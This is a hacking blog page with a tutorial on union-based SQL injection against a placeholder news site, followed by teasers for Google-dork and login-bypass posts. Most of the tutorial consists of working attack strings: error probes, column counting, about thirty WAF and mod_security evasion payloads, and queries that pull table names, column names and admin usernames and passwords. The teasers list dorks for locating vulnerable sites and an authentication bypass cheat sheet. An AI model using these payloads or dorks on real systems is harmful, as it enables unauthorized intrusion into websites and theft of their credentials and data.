Skip to main content

SQL injection + WAF Bypassing

   Union Based SQL Injection (WAF Bypassing)


Tutorial on Basics Of SQL Injection.  
                                       SQL Injection- Basics Of SQLi Part-1
                                       SQL Injection- Basics Of SQLi Part-2




Union based SQL injection + WAF Bypassing By PRESSI



Today i m Going To Discuss About Union based SQL injection And WAF Bypassing Techniques.
Lets Start Injecting.

 Here Is Our Target .

http://www.targetsite.com/news.php?id=11
Add Single Quote (') at the End Of The URL .

http://www.targetsite.com/news.php?id=11' 




And Get MYSQL Error.
Lets Balance Our Query  for Further Injecting.
Some Comments from our Previous Tutorials.

http://www.targetsite.com/news.php?id=11--

 http://www.targetsite.com/news.php?id=11--+

 http://www.targetsite.com/news.php?id=11-- - 

 http://www.targetsite.com/news.php?id=11%23

 http://www.targetsite.com/news.php?id=11;

   Here Is A Small Explanation on Balance and Comment in our Injection.

After Balancing Our Query . Next is Count Total Number Of Columns
http://www.targetsite.com/news.php?id=11 order by 1--+
No Error !
http://www.targetsite.com/news.php?id=11 order by 3--+
No Error!

http://www.targetsite.com/news.php?id=11 order by 5--+
Again No Error !

 http://www.targetsite.com/news.php?id=11 order by 6--+
Here We Get Error !
Unknown column '6' in 'order clause'

 Now Try To Find Our Vulnerable Columns.

 http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

If Our Target site Is Protected with WAF . WAF Will Block Our Query and Give Us Mod_Security Error.

 So Here some WAF Bypassing Methods.
   /*!%55NiOn*/ /*!%53eLEct*/
   %55nion(%53elect 1,2,3)-- -
   +union+distinct+select+
   +union+distinctROW+select+
   /**//*!12345UNION SELECT*//**/
   /**//*!50000UNION SELECT*//**/
   /**/UNION/**//*!50000SELECT*//**/
   /*!50000UniON SeLeCt*/
   union /*!50000%53elect*/
   +#uNiOn+#sEleCt
   +#1q%0AuNiOn all#qa%0A#%0AsEleCt
   /*!%55NiOn*/ /*!%53eLEct*/
   /*!u%6eion*/ /*!se%6cect*/
   +un/**/ion+se/**/lect
   uni%0bon+se%0blect
   %2f**%2funion%2f**%2fselect
   union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
   REVERSE(noinu)+REVERSE(tceles)
   /*--*/union/*--*/select/*--*/
   union (/*!/**/ SeleCT */ 1,2,3)
   /*!union*/+/*!select*/
   union+/*!select*/
   /**/union/**/select/**/
   /**/uNIon/**/sEleCt/**/
   /**//*!union*//**//*!select*//**/
   /*!uNIOn*/ /*!SelECt*/
   +union+distinct+select+
   +union+distinctROW+select+
 Just Change The Union Select With Following Bypass URLs.

 Lets Continue Our Tutorial.
Now Check The Vulnerable Columns.we Use ( - ) for Finding Vulnerable columns.

 We Can Also Check Vulnerable Columns with Other methods instead of Just Using (-).

Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

 Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+ 

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+ 

 Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+ 

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+ 


http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

We Will Get Our Vulnerable Columns Printed On The Page.3 is Our Vulnerable Column.



Here Are Some Variables Of  MYSQL.


 @@version                           =  Current Version
@@GLOBAL.VERSION    = Current Version
User()                                   = Current User
Database                              = Current Database

 http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+

 We Can See Current Version Printed on the Page.
 Next Step Is To Get  The Tables.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+

 We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.
then encode admin table name in MYSQL Char() to get The Columns in the Admin Table.Change table_name to column_name,information_schema.tables to information_schema.columns and Table_schema to Table_name.And Replace Database() with our MYSQL Char() admin value.

 http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--+

 we can  see the Column Names on Page . like id,username,pass
to Get The Data From columns here is our final Query.

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(username,0x3a,password),4,5 from admin--+



Labels:

Comments

  1. Unknown10 March 2017 at 09:52

    Please can you do some screen shot about this WAF Bypassing Methods do you recommend any tools to perform this injections which i think might me more easier and direct link to download the tools please kindly advise ..please what you mean by union select Thank You.

    ReplyDelete

Post a Comment

Popular posts from this blog

ADMIN BYPASS

        HOW TO BYPASS ADMIN PANEL                       i will tell how about Website Hacking using Admin Panel bypass method Okay let’s start, So we will first find the admin panels using Google Dorks,  google darks for finding vulnerable admin panel                        .pk admin login                       pk inurl /admin/login.aspx                       pk inurl /admin                       inurl admin login asp site pk                       admin login.asp india                       admin login.asp college                       admin login.asp                       pk5001z admin login                        inurl:admin/index.php                       inurl:administrator.php                       inurl:administrator.asp                       inurl:login.asp                       inurl:login.aspx                       inurl:login.php                       inurl:admin/index.php                       inurl:adminlogin.aspx  Once you got the admin panel,
3 comments
Read more

Google Dorks For SQL Injection

Google Dorks For SQL Injection Google Dorks For SQL Injection 1500+ google Dorks for sql injection. Definition of google dorks: Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site. allinurl:*.php?txtCodiInfo= inurl:read.php?= inurl:”ViewerFrame?Mode=” inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= i
1 comment
Read more

SQL Injection Admin panel Bypass

SQL Injection Authentication Bypass Cheat Sheet This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member) or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin'
3 comments
Read more